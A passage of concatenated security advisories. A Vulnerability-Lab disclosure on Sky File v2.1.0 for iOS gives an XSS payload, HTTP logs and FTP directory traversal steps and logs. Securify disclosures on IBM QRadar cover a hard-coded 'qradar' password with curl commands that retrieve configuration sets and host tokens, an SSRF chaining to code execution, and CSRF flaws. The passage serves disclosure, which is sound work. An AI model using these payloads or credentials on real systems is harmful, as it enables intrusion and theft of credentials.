We do not approve or encourage anybody to break any licenses, policies,
deface websites, hack into databases or trade with stolen data.

Domains:    www.vulnerability-lab.com    www.vuln-lab.com      
www.vulnerability-db.com
Services:   magazine.vulnerability-lab.com
paste.vulnerability-db.com       infosec.vulnerability-db.com
Social:      twitter.com/vuln_lab    facebook.com/VulnerabilityLab     
youtube.com/user/vulnerability0lab
Feeds:      vulnerability-lab.com/rss/rss.php
vulnerability-lab.com/rss/rss_upcoming.php
vulnerability-lab.com/rss/rss_news.php
Programs:   vulnerability-lab.com/submit.php
vulnerability-lab.com/register.php
vulnerability-lab.com/list-of-bug-bounty-programs.php

Any modified copy or reproduction, including partially usages, of this
file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified
form is granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers.
All pictures, texts, advisories, source code, videos and other
information on this website is trademark of vulnerability-lab team & the
specific authors or managers. To record, list, modify, use or
edit our material contact (admin@ or research@) to get a ask permission.

            Copyright © 2020 | Vulnerability Laboratory - [Evolution
Security GmbH]™




-- 
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com

Document Title:
===============
Sky File v2.1.0 iOS - Multiple Web Vulnerabilities


References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2207


Release Date:
=============
2020-04-21


Vulnerability Laboratory ID (VL-ID):
====================================
2207


Common Vulnerability Scoring System:
====================================
7.2


Vulnerability Class:
====================
Multiple


Current Estimated Price:
========================
1.000€ - 2.000€


Product & Service Introduction:
===============================
Sky File Transfer mainly to solve the problem of mobile device file
management and file transfer, through
our application can help you quickly transfer files to mobile devices,
so that your mobile device as U disk
as used, carry, at any time transmission. Our folder management similar
to the PC computer file mode of
operation, so you manage the file on the mobile device will be as
convenient as the PC, it is not only
suitable for personal life, but also very suitable for office use, it
will bring you more High efficiency.

(Copy of the Homepage:
https://apps.apple.com/us/app/sky-file-wireless-transfer/id1236452210 )


Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered multiple web
vulnerabilities in the official Sky File v2.1.0 mobile ios wifi
web-application.


Affected Product(s):
====================
Jin Chen
Product: Sky File v2.1.0 - (iOS) Mobile Web Application


Vulnerability Disclosure Timeline:
==================================
2020-04-21: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Exploitation Technique:
=======================
Remote


Severity Level:
===============
High


Authentication Type:
====================
No authentication (guest)


User Interaction:
=================
Low User Interaction


Disclosure Type:
================
Independent Security Research


Technical Details & Description:
================================
1.1
Multiple persistent cross site scripting vulnerabilities has been
discovered in the official Sky File v2.1.0 mobile ios web-application.
The vulnerability allows remote attackers to inject own malicious script
codes with persistent attack vector to compromise browser to
web-application requests from the application-side.

The cross site vulnerability is located in the 'createFolder' module.
Remote attackers with access to the ui via wifi are able
to inject own malicious persistent script code to compromise the
web-application or user credentials. The request method to
inject is POST and the attack vector is located on the application-side.

Successful exploitation of the vulnerability results session hijacking,
persistent phishing, persistent external redirects  and
application-side manipulation of the web context of the affected and
connected device module.


1.2
A directory traversal web vulnerability has been discovered in the
official Sky File v2.1.0 mobile ios web-application.
The web vulnerability allows an attacker to unauthorized change the path
or directory to access sensitive application data.

The directory / path webvulnerability is located in the local ftp server
configuration and path validation with the insecure
access permissions. Normally the anonymous user account is only able to
move inside the main app folder but not above to the
web-server and root application files. In case of the issue remote
attackers are able to connect with anonymous user account
credentials to the wifi ftp server. After that the attacker can use a
misconfiguration in the ftp server of the app path to
transmit a `/null//` path commands after CWD and CDUP navigation via ftp
client. Thus allows the attacker to finally
unauthorized access the main root application path.

Successful exploitation of the directory traversal vulnerability results
in unauthorized file system access and information disclosure.


Proof of Concept (PoC):
=======================
1.1
The persistent script code inject vulnerability can be exploited by
remote attackers with wifi network access with low user interaction.
For security demonstration or to reproduce the web vulnerability follow
the provided information and steps below to continue.


PoC: Payload
%2F%3E%22%3E%3Ciframe+src%3Devil.source+onload%3Dalert(%22PWND%22)%3E%3E%22%3E


--- PoC Session Logs [POST] ---
Status: 200[OK]
POST http://localhost:10000/create
Mime Type[application/json]
   Request Header:
      Host[localhost:10000]
      User-Agent[Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0)
Gecko/20100101 Firefox/52.0]
      Accept[application/json, text/javascript, */*; q=0.01]
      Accept-Language[de,en-US;q=0.7,en;q=0.3]
      Accept-Encoding[gzip, deflate]
      Content-Type[application/x-www-form-urlencoded; charset=UTF-8]
      X-Requested-With[XMLHttpRequest]
      Referer[http://localhost:10000/]
      Content-Length[140]
      Connection[keep-alive]
   POST-Daten:

path[%2F%3E%22%3E%3Ciframe+src%3Devil.source+onload%3Dalert(%22PWND%22)%3E%3E%22%3E]
   Response Header:
      Cache-Control[no-cache]
      Content-Length[2]
      Content-Type[application/json]
      Connection[Close]
      Server[GCDWebUploader]
-
Status: 200[OK]
GET
http://localhost:10000/list?path=%2F%3E%22%3E%3Ciframe+src%3Devil.source+onload%3Dalert(%22PWND%22)%3E%3E
Mime Type[application/json]
   Request Header:
      Host[localhost:10000]
      User-Agent[Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0)
Gecko/20100101 Firefox/52.0]
      Accept[application/json, text/javascript, */*; q=0.01]
      Accept-Language[de,en-US;q=0.7,en;q=0.3]
      Accept-Encoding[gzip, deflate]
      X-Requested-With[XMLHttpRequest]
      Referer[http://localhost:10000/]
      Connection[keep-alive]
   Response Header:
      Cache-Control[no-cache]
      Content-Length[2]
      Content-Type[application/json]
      Connection[Close]
      Server[GCDWebUploader]
-
Status: 200[OK]
GET http://localhost:10000/evil.source
Mime Type[application/x-unknown-content-type]
   Request Header:
      Host[localhost:10000]
      User-Agent[Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0)
Gecko/20100101 Firefox/52.0]

Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
      Accept-Language[de,en-US;q=0.7,en;q=0.3]
      Accept-Encoding[gzip, deflate]
      Referer[http://localhost:10000/]
      Connection[keep-alive]
      Upgrade-Insecure-Requests[1]
   Response Header:
      Server[GCDWebUploader]
      Connection[Close]



1.2
The directory traversal web vulnerability can be exploited by remote
attackers with wifi network access without user interaction.
For security demonstration or to reproduce the web vulnerability follow
the provided information and steps below to continue.


Manual steps to reproduce ...
1. Open the ftp preview the visible folders
2. Jump back to the the following path
/private/var/mobile/Containers/Data/Application/A9124FFE-16D8-413B-83B7-4018B69AEB45/
3. Include the payload /(null)// and refresh via list command
4. You are now placed in an empty folder without permission to move
5. Add to /(null)/../ to the path and refresh the client
6. Path traversal successful to access the main app root path (./) that
is normally not accessable
7. Successful reproduce of the path traversal web vulnerability!


PoC: Payload
/(null)//  to  /(null)/../


--- PoC Sessio Logs (FTP) ---
[21:52:40] [R] 221- Data traffic for this session was 0 bytes in 0 files
[21:52:40] [R] 221 Thank you for using the FTP service on localhost.
[21:52:40] [R] Logged off: 192.168.2.116 (Duration: 26 seconds)
[21:52:42] [R] Connecting to 192.168.2.116 -> IP=192.168.2.116 PORT=10001
[21:52:42] [R] Connected to 192.168.2.116
[21:52:42] [R] 220 iosFtp server ready.
[21:52:42] [R] USER anonymous
[21:52:42] [R] 331 Password required for (null)
[21:52:42] [R] PASS (hidden)
[21:52:42] [R] 230 User (null) logged in.
[21:52:42] [R] SYST
[21:52:42] [R] 215 UNIX Type: L8 Version: iosFtp 20080912
[21:52:42] [R] FEAT
[21:52:42] [R] 211-Features supported
[21:52:42] [R]  UTF8
[21:52:42] [R] 211 End
[21:52:42] [R] OPTS UTF8 ON
[21:52:42] [R] 200 Type set Opts to  UTF8.
[21:52:42] [R] PWD
[21:52:42] [R] 257
"/private/var/mobile/Containers/Data/Application/A9124FFE-16D8-413B-83B7-4018B69AEB45/Documents/myFolder/iFolder"
is the current directory.
[21:52:42] [R] CWD /(null)/
[21:52:42] [R] 550 CWD failed.
[21:52:42] [R] PWD
[21:52:42] [R] 257
"/private/var/mobile/Containers/Data/Application/A9124FFE-16D8-413B-83B7-4018B69AEB45/Documents/myFolder/iFolder"
is the current directory.
[21:52:42] [R] PASV
[21:52:42] [R] 227 Entering Passive Mode (192,168,2,116,39,252)
[21:52:42] [R] Opening data connection IP: 192.168.2.116 PORT: 10236
[21:52:42] [R] LIST -al
[21:52:42] [R] 150 Opening ASCII mode data connection for '/bin/ls'.
[21:52:42] [R] 226 Transfer complete.
[21:52:42] [R] List Complete: 149 bytes in 0,08 seconds (0,1 KB/s)
[21:52:43] [R] CDUP
[21:52:43] [R] 250 CDUP command successful.
[21:52:43] [R] PWD
[21:52:43] [R] 257
"/private/var/mobile/Containers/Data/Application/A9124FFE-16D8-413B-83B7-4018B69AEB45/Documents/myFolder"
is the current directory.
[21:52:43] [R] PASV
[21:52:43] [R] 227 Entering Passive Mode (192,168,2,116,87,51)
[21:52:43] [R] Opening data connection IP: 192.168.2.116 PORT: 22323
[21:52:43] [R] LIST -al
[21:52:43] [R] 150 Opening ASCII mode data connection for '/bin/ls'.
[21:52:43] [R] 226 Transfer complete.
[21:52:43] [R] List Complete: 308 bytes in 0,10 seconds (0,3 KB/s)
[21:52:43] [R] CDUP
[21:52:44] [R] 250 CDUP command successful.
[21:52:44] [R] PWD
[21:52:44] [R] 257
"/private/var/mobile/Containers/Data/Application/A9124FFE-16D8-413B-83B7-4018B69AEB45/Documents"
is the current directory.
[21:52:44] [R] PASV
[21:52:44] [R] 227 Entering Passive Mode (192,168,2,116,151,51)
[21:52:44] [R] Opening data connection IP: 192.168.2.116 PORT: 38707
[21:52:44] [R] LIST -al
[21:52:44] [R] 150 Opening ASCII mode data connection for '/bin/ls'.
[21:52:44] [R] 226 Transfer complete.
[21:52:44] [R] List Complete: 127 bytes in 0,08 seconds (0,1 KB/s)
[21:53:34] [R] CDUP
[21:53:34] [R] 250 CDUP command successful.
[21:53:34] [R] PWD
[21:53:34] [R] 257
"/private/var/mobile/Containers/Data/Application/A9124FFE-16D8-413B-83B7-4018B69AEB45"
is the current directory.
[21:53:34] [R] PASV
[21:53:34] [R] 227 Entering Passive Mode (192,168,2,116,227,14)
[21:53:34] [R] Opening data connection IP: 192.168.2.116 PORT: 58126
[21:53:34] [R] LIST -al
[21:53:34] [R] 150 Opening ASCII mode data connection for '/bin/ls'.
[21:53:34] [R] 226 Transfer complete.
[21:53:34] [R] List Complete: 312 bytes in 0,08 seconds (0,3 KB/s)
[21:53:35] [R] CDUP
[21:53:35] [R] 250 CDUP command successful.
[21:53:35] [R] PWD
[21:53:35] [R] 257 "(null)" is the current directory.
[21:53:35] [R] PASV
[21:53:35] [R] 227 Entering Passive Mode (192,168,2,116,159,14)
[21:53:35] [R] Opening data connection IP: 192.168.2.116 PORT: 40718
[21:53:35] [R] LIST -al
[21:53:35] [R] 150 Opening ASCII mode data connection for '/bin/ls'.
[21:53:35] [R] 226 Transfer complete.
[21:53:35] [R] List Complete: 0 bytes in 0,07 seconds (0,0 KB/s)
[21:53:35] [R] PASV
[21:53:35] [R] 227 Entering Passive Mode (192,168,2,116,143,14)
[21:53:35] [R] Opening data connection IP: 192.168.2.116 PORT: 36622
[21:53:35] [R] LIST -al
[21:53:35] [R] 150 Opening ASCII mode data connection for '/bin/ls'.
[21:53:35] [R] 226 Transfer complete.
[21:53:35] [R] List Complete: 0 bytes in 0,06 seconds (0,0 KB/s)
[21:53:36] [R] CDUP
[21:53:36] [R] 550 CDUP command failed.
[21:53:41] [R] CWD /etc
[21:53:41] [R] 250 CWD command successful.
[21:53:41] [R] PWD
[21:53:41] [R] 257 "(null)" is the current directory.
[21:53:48] [R] CDUP
[21:53:48] [R] 550 CDUP command failed.
[21:53:51] [R] CWD /
[21:53:51] [R] 250 CWD command successful.
[21:53:51] [R] PWD
[21:53:51] [R] 257 "/" is the current directory.
[21:53:51] [R] PASV
[21:53:51] [R] 227 Entering Passive Mode (192,168,2,116,221,173)
[21:53:51] [R] Opening data connection IP: 192.168.2.116 PORT: 56749
[21:53:51] [R] LIST -al
[21:53:51] [R] 150 Opening ASCII mode data connection for '/bin/ls'.
[21:53:51] [R] 226 Transfer complete.
[21:53:51] [R] List Complete: 741 bytes in 0,10 seconds (0,7 KB/s)
[21:54:02] [R] TYPE I
[21:54:02] [R] 200 Type set to  I.

Listing Path ./root
- Applications
- bin
- cores
- developer
- Library
- private
- sbin
- System
- usr
- etc
- var
- tmp


Security Risk:
==============
1.1
The security risk of the persistent input validation web vulnerability
in the createfolder input field is estimated as medium.

1.2
The security risk of the directory traversal web vulnerability in the
mobile ios web application is estimated as high.


Credits & Authors:
==================
Vulnerability-Lab -
https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
Benjamin Kunz Mejri -
https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without
any warranty. Vulnerability Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability
and capability for a particular purpose. Vulnerability-Lab
or its suppliers are not liable in any case of damage, including direct,
indirect, incidental, consequential loss of business profits
or special damages, even if Vulnerability-Lab or its suppliers have been
advised of the possibility of such damages. Some states do
not allow the exclusion or limitation of liability for consequential or
incidental damages so the foregoing limitation may not apply.
We do not approve or encourage anybody to break any licenses, policies,
deface websites, hack into databases or trade with stolen data.

Domains:    www.vulnerability-lab.com    www.vuln-lab.com      
www.vulnerability-db.com
Services:   magazine.vulnerability-lab.com
paste.vulnerability-db.com       infosec.vulnerability-db.com
Social:      twitter.com/vuln_lab    facebook.com/VulnerabilityLab     
youtube.com/user/vulnerability0lab
Feeds:      vulnerability-lab.com/rss/rss.php
vulnerability-lab.com/rss/rss_upcoming.php
vulnerability-lab.com/rss/rss_news.php
Programs:   vulnerability-lab.com/submit.php
vulnerability-lab.com/register.php
vulnerability-lab.com/list-of-bug-bounty-programs.php

Any modified copy or reproduction, including partially usages, of this
file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified
form is granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers.
All pictures, texts, advisories, source code, videos and other
information on this website is trademark of vulnerability-lab team & the
specific authors or managers. To record, list, modify, use or
edit our material contact (admin@ or research@) to get a ask permission.

            Copyright © 2020 | Vulnerability Laboratory - [Evolution
Security GmbH]™




-- 
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com

------------------------------------------------------------------------
Unauthorized access to QRadar configuration sets via default password
------------------------------------------------------------------------
Yorick Koster, September 2019

------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
QRadar is deployed with a default password for the ConfigServices
account. Using this default password it is possible to download
configuration sets containing sensitive information, including
(encrypted) credentials and host tokens. With these host tokens it is
possible to access other parts of QRadar.

------------------------------------------------------------------------
See also
------------------------------------------------------------------------
CVE-2020-4269 [2]
6189711 [3] - IBM QRadar SIEM contains hard-coded credentials
(CVE-2020-4269)

------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
This issue was successfully verified on QRadar Community Edition [4]
version 7.3.1.6 (7.3.1 Build 20180723171558).

------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
IBM has released the following versions of QRader in which this issue
has been resolved:

- QRadar / QRM / QVM / QNI 7.4.0 GA [5] (SFS)
- QRadar / QRM / QVM / QRIF / QNI 7.3.3 Patch 3 [6] (SFS)
- QRadar / QRM / QVM / QRIF / QNI 7.3.2 Patch 7 [7] (SFS)
- QRadar Incident Forensics 7.4.0 [8] (ISO)
- QRadar Incident Forensics 7.4.0 [9] (SFS)

As a workaround it is possible to remove or disable the configservices
account in the file /opt/qradar/conf/users.conf.

------------------------------------------------------------------------
Introduction
------------------------------------------------------------------------
QRadar [10] is IBM's enterprise SIEM [11] solution. A free version of
QRadar is available that is known as QRadar Community Edition [4]. This
version is limited to 50 events per second and 5,000 network flows a
minute, supports apps, but is based on a smaller footprint for
non-enterprise use.

So-called configuration sets can be downloaded via the web interface.
These sets are normally only accessible for the ConfigServices user. It
was found that QRadar is deployed with a default password for the
ConfigServices account. Using this default password it is possible to
download configuration sets containing sensitive information, including
(encrypted) credentials and host tokens. With these host tokens it is
possible to access other parts of QRadar.

------------------------------------------------------------------------
Details
------------------------------------------------------------------------
The Apache configuration for the QRadar web interface contains a
configuration alias that maps to the
/store/configservices/configurationsets folder. This folder is protected
with the mod_authn_file [12] Apache Module. The only user that is
allowed through is the configservices user.

/etc/httpd/conf.d/configservices_httpd.conf:
Alias /configuration /store/configservices/configurationsets
<Directory /store/configservices/configurationsets>
  AuthType Basic
  AuthUserFile  /opt/qradar/conf/users.conf
  AuthName "Identification"
  Options Indexes Includes FollowSymLinks MultiViews ExecCGI
  AllowOverride All

<Limit GET POST>
  require user configservices
</Limit>
</Directory>

The password for this user is set in the file
/opt/qradar/conf/users.conf. The password is protected with the crypt
algorithm, the crypted password is the same for all QRadar
installations.

/opt/qradar/conf/users.conf:
admin:null:ALL:root@localhost:Admin:
configservices:/wEPae8TzCqmM:ALL::ConfigServices:

Cracking the crypted password quickly reveals that the corresponding
password is qradar:

$ python -c 'import crypt; print(crypt.crypt("qradar", "/w"))'
/wEPae8TzCqmM

With the found password it is now possible to download the configuration
set from the web server:

$ curl --insecure --user configservices:qradar
https://<ip>/configuration/globalset_list.xml

It should be noted that the default password of the configservices user
only works for the configuration alias as configured in Apache. Recent
versions of QRadar still use the ConfigServices user in other parts of
the web interface. These parts either use a random password (stored in
PostgreSQL) or a so-called host token (via the SEC header or cookie).
However, using the default password it is possible to retrieve the value
of this host token and thus gain access to other parts of QRadar.

curl --insecure --user configservices:qradar -o
/tmp/zipfile_GEN.full.zip
https://<ip>/configuration/zipfile_GEN.full.zip
unzip -p /tmp/zipfile_GEN.full.zip /host_tokens.masterlist | grep
'CONSOLE_HOSTCONTEXT='

------------------------------------------------------------------------
Limitations
------------------------------------------------------------------------
The users.conf configuration file is updated when changes are made to
the user and or permission configuration of QRadar. The new users.conf
is first written to staging and made effective when the changes to
staging have been deployed. When this happens the password digest of the
configservices user is overwritten with null effectively disabling the
account. Consequently, on larger setups it is likely that changes have
been made to the user/permission configuration and that the default
password will no longer work.

com.q1labs.core.shared.permissions.UserManager:
public class UserManager extends SingletonSupport implements
IMessageListener {
[...]

  public void updateConfigurationFile() {
    String configRoot = NVAReader.getProperty("CONFIGSERVICES_ROOT");

    try {
      File target = new File(configRoot + STAGED_CONFIG_FILENAME);
      StringBuffer sb = new StringBuffer();
      List users = this.getStagedUsers();
      Iterator var5 = users.iterator();

      while(var5.hasNext()) {
        User u = (User)var5.next();
        String networkNames = PermissionsManager.getNetworkNames(u);
        String userRoleName = PermissionsManager.getUserRoleName(u);
        String locale = u.getLocale() == null ? "" : u.getLocale();
        String tmzone = u.getTimezone() == null ? "" : u.getTimezone();
        sb.append(u.getUserName() + ":null:" + networkNames + ":" + u.getEmail() + ":" + userRoleName + ":" + locale + ":" + tmzone + ":\n");
      }

      FileIOUtils.safeWriteBuffer(target, sb);
    } catch (Exception var11) {
      this.log.error((Object)("Can't save deployed " + TABLENAME + " to configuration file"), (Throwable)var11);
    }

  }
------------------------------------------------------------------------
References
------------------------------------------------------------------------
[1] https://www.securify.nl/advisory/SFY20200401/unauthorized-access-to-qradar-configuration-sets-via-default-password.html
[2] https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-4269
[3] https://www.ibm.com/support/pages/node/6189711
[4] https://developer.ibm.com/qradar/ce/
[5] https://www.ibm.com/support/fixcentral/swg/downloadFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Security+QRadar+SIEM&release=7.4.0&platform=Linux&function=fixId&fixids=7.4.0-QRADAR-QRSIEM-20200304205308&includeRequisites=1&includeSupersedes=0&downloadMethod=http
[6] https://www.ibm.com/support/fixcentral/swg/downloadFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Security+QRadar+SIEM&release=7.3.0&platform=Linux&function=fixId&fixids=7.3.3-QRADAR-QRSIEM-20200409085709&includeRequisites=1&includeSupersedes=0&downloadMethod=http
[7] https://www.ibm.com/support/fixcentral/swg/downloadFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Security+QRadar+SIEM&release=7.3.0&platform=Linux&function=fixId&fixids=7.3.2-QRADAR-QRSIEM-20200406171249&includeRequisites=1&includeSupersedes=0&downloadMethod=http
[8] https://www.ibm.com/support/fixcentral/swg/downloadFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Security+QRadar+Incident+Forensics&release=7.4.0&platform=Linux&function=fixId&fixids=7.4.0-QRADAR-QIFFULL-2019.18.0.20200304205308&includeRequisites=1&includeSupersedes=0&downloadMethod=http
[9] https://www.ibm.com/support/fixcentral/swg/downloadFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Security+QRadar+Incident+Forensics&release=7.4.0&platform=Linux&function=fixId&fixids=7.4.0-QRADAR-QIFSFS-2019.18.0.20200304205308&includeRequisites=1&includeSupersedes=0&downloadMethod=http
[10] https://www.ibm.com/security/security-intelligence/qradar
[11] https://en.wikipedia.org/wiki/Security_information_and_event_management
[12] https://httpd.apache.org/docs/2.4/mod/mod_authn_file.html

------------------------------------------------------------------------
QRadar RssFeedItem Server-Side Request Forgery vulnerability
------------------------------------------------------------------------
Yorick Koster, September 2019

------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
The RssFeedItem class of the QRadar web application is used to fetch and
parse RSS feeds. No validation is performed on the user-supplied RSS
feed URL. Due to the lack of URL validation (whitelisting), it is
possible for authenticated attackers to execute Server-Side Request
Forgery attacks. Using this issue it is possible to call the Apache Axis
AdminService webservice in order to execute arbitrary code with the
privileges of the Tomcat user.

------------------------------------------------------------------------
See also
------------------------------------------------------------------------
CVE-2020-4294 [2]
6189663 [3] - IBM QRadar SIEM is vulnerable to Server-Side Request
Forgery (SSRF) (CVE-2020-4294)

------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
This issue was successfully verified on QRadar Community Edition [4]
version 7.3.1.6 (7.3.1 Build 20180723171558).

------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
IBM has released the following versions of QRader in which this issue
has been resolved:

- QRadar / QRM / QVM / QNI 7.4.0 GA [5] (SFS)
- QRadar / QRM / QVM / QRIF / QNI 7.3.3 Patch 3 [6] (SFS)
- QRadar / QRM / QVM / QRIF / QNI 7.3.2 Patch 7 [7] (SFS)
- QRadar Incident Forensics 7.4.0 [8] (ISO)
- QRadar Incident Forensics 7.4.0 [9] (SFS)

------------------------------------------------------------------------
Introduction
------------------------------------------------------------------------
QRadar [10] is IBM's enterprise SIEM [11] solution. A free version of
QRadar is available that is known as QRadar Community Edition [4]. This
version is limited to 50 events per second and 5,000 network flows a
minute, supports apps, but is based on a smaller footprint for
non-enterprise use.

The RssFeedItem class of the QRadar web application is used to fetch and
parse (and cache) RSS feeds. The class is exposed in the JSON-RPC
interface via the qradar.getRssFeedItem method. This method can be
called by any authenticated user, no special privileges are required.
RSS feeds are fetched using the Apache Commons HttpClient class, no
validation is performed on the user-supplied URL. Due to the lack of URL
validation (whitelisting), it is possible for authenticated attackers to
execute Server-Side Request Forgery attacks.

------------------------------------------------------------------------
Details
------------------------------------------------------------------------
Authenticated users can trigger the Server-Side Request Forgery
vulnerability by making a JSON-RPC call with the method set to
qradar.getRssFeedItem. This call is mapped to
com.q1labs.qradar.ui.dashboard.RssFeedItem.getRssFeedItem() and takes
one parameter named feedURL. Any valid URL can be passed to this method.

com.q1labs.qradar.ui.dashboard.RssFeedItem:
public class RssFeedItem extends DashboardItem {
[...]

  public static DashboardItem getRssFeedItem(PageContext pageContext, String feedURL) throws Exception {
    sessionContext = RequestUtils.getSessionContext((HttpServletRequest)pageContext.getRequest());
    RssFeedItem cachedItem = (RssFeedItem)feedCache.get(feedURL);
    cachedItem = null;
    if (cachedItem == null || System.currentTimeMillis() - cachedItem.lastUpdateTime >= 600000L) {
      cachedItem = new RssFeedItem(pageContext, feedURL);
      feedCache.put(feedURL, cachedItem);
    }

    return cachedItem;
  }

No validation is done on the user-supplied URL, it is directly passed to
HttpClient that will try to make a GET request to this URL. This
behavior allows for Server-Side Request Forgery. The returned HTTP
response is parsed as RSS feed. If the response isn't a valid RSS feed,
an error is returned to the user. Due to this it is not possible to read
the HTTP response, however the GET request is still executed. By abusing
this vulnerability it is possible for an authenticated attacker to make
GET requests to services that are normally not accessible, including
webservices of QRadar that can only be accessed from the local machine.

com.q1labs.qradar.ui.dashboard.RssFeedItem:
public RssFeedItem(PageContext pageContext, String rssURLString) {
  GetMethod getMethod = null;
  Locale locale = LocaleUtil.getLocale((HttpServletRequest)pageContext.getRequest());

  try {
    getMethod = new GetMethod(rssURLString);
    HttpClient client = new HttpClient();
    ISessionContext sessionContext = RequestUtils.getSessionContext((HttpServletRequest)pageContext.getRequest());
    UIAutoupdateService autoupdateService = UIAutoupdateService.getInstance();
    String proxyHost = autoupdateService.getSetting(sessionContext, "proxy_server");
    String proxtPortString = autoupdateService.getSetting(sessionContext, "proxy_port");
    int proxyPort;

[...]

    try {
      proxyPort = client.executeMethod(getMethod);
      this.log.debug("Proxy request successful.");
    } catch (Exception var29) {
      this.log.warn("Proxy request failed. Falling back to default HTTP request.");
      if (StringUtils.isNotEmpty(client.getHostConfiguration().getProxyHost())) {
        client = new HttpClient();
        proxyPort = client.executeMethod(getMethod);
      }
    }

The QRadar web application is deployed with Apache Axis [12] version 1.2
to expose a number of SOAP services. The AdminService webservice is
enabled, which allows deploying and undeploying of webservices. The
enableRemoteAdmin option is set to false, meaning that the webservice
can only be called from localhost. By abusing the Server-Side Request
Forgery vulnerability it is possible to call the AdminService webservice
and execute arbitrary code.

------------------------------------------------------------------------
References
------------------------------------------------------------------------
[1] https://www.securify.nl/advisory/SFY20200402/qradar-rssfeeditem-server-side-request-forgery-vulnerability.html
[2] https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-4294
[3] https://www.ibm.com/support/pages/node/6189663
[4] https://developer.ibm.com/qradar/ce/
[5] https://www.ibm.com/support/fixcentral/swg/downloadFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Security+QRadar+SIEM&release=7.4.0&platform=Linux&function=fixId&fixids=7.4.0-QRADAR-QRSIEM-20200304205308&includeRequisites=1&includeSupersedes=0&downloadMethod=http
[6] https://www.ibm.com/support/fixcentral/swg/downloadFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Security+QRadar+SIEM&release=7.3.0&platform=Linux&function=fixId&fixids=7.3.3-QRADAR-QRSIEM-20200409085709&includeRequisites=1&includeSupersedes=0&downloadMethod=http
[7] https://www.ibm.com/support/fixcentral/swg/downloadFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Security+QRadar+SIEM&release=7.3.0&platform=Linux&function=fixId&fixids=7.3.2-QRADAR-QRSIEM-20200406171249&includeRequisites=1&includeSupersedes=0&downloadMethod=http
[8] https://www.ibm.com/support/fixcentral/swg/downloadFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Security+QRadar+Incident+Forensics&release=7.4.0&platform=Linux&function=fixId&fixids=7.4.0-QRADAR-QIFFULL-2019.18.0.20200304205308&includeRequisites=1&includeSupersedes=0&downloadMethod=http
[9] https://www.ibm.com/support/fixcentral/swg/downloadFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Security+QRadar+Incident+Forensics&release=7.4.0&platform=Linux&function=fixId&fixids=7.4.0-QRADAR-QIFSFS-2019.18.0.20200304205308&includeRequisites=1&includeSupersedes=0&downloadMethod=http
[10] https://www.ibm.com/security/security-intelligence/qradar
[11] https://en.wikipedia.org/wiki/Security_information_and_event_management
[12] http://axis.apache.org/

------------------------------------------------------------------------
Cross-Site Request Forgery & weak access control in QRadar
ConfigServices webservice
------------------------------------------------------------------------
Yorick Koster, September 2019

------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
The QRadar web application is deployed with Apache Axis to expose a
number of SOAP services. No measures have been implemented in Axis
and/or QRadar to prevent Cross-Site Request Forgery attacks against
these webservices. Due to this it is possible for an attacker to call
any exposed service via Cross-Site Request Forgery. A successful attack
requires that the attacker tricks/forces a logged in victim to visit the
attacker's specially crafted URL.

Besides the lack of Cross-Site Request Forgery protection, most methods
also lack proper access control checks. A handful of these methods
perform some form of access control, but most methods can be called by
any authenticated user. This could for example be used by a logged in
attacker to gain access to sensitive information (eg, login
credentials).

------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
This issue was successfully verified on QRadar Community Edition [2]
version 7.3.1.6 (7.3.1 Build 20180723171558).

------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
IBM reports that Apache Axis is no longer used and therefore this issues
has been resolved in upstream builds. In addtion, it is stated that
thist issue is resolved in QRadar Community Edition version 7.3.3 [3].

------------------------------------------------------------------------
Introduction
------------------------------------------------------------------------
QRadar [4] is IBM's enterprise SIEM [5] solution. A free version of
QRadar is available that is known as QRadar Community Edition [2]. This
version is limited to 50 events per second and 5,000 network flows a
minute, supports apps, but is based on a smaller footprint for
non-enterprise use.

The QRadar web application is deployed with Apache Axis [6] to expose a
number of SOAP services. By default, Axis allows users to call the SOAP
services via a GET request. The GET request is internally converted to a
SOAP envelope, before it is processed by Axis. No measures have been
implemented in Axis and/or QRadar to prevent Cross-Site Request Forgery
attacks against the webservices exposed by Axis. Due to this it is
possible for an attacker to call any exposed service via Cross-Site
Request Forgery. A successful attack requires that the attacker
tricks/forces a logged in victim to visit the attacker's specially
crafted URL.

Besides the lack of Cross-Site Request Forgery protection, most methods
also lack proper access control checks. A handful of these methods
perform some form of access control, but most methods can be called by
any authenticated user. This could for example be used by a logged in
attacker to gain access to sensitive information.

By calling the getNvaProperty() method, it is possible to retrieve any
'NVA' configuration setting. Sensitive settings, like passwords, are
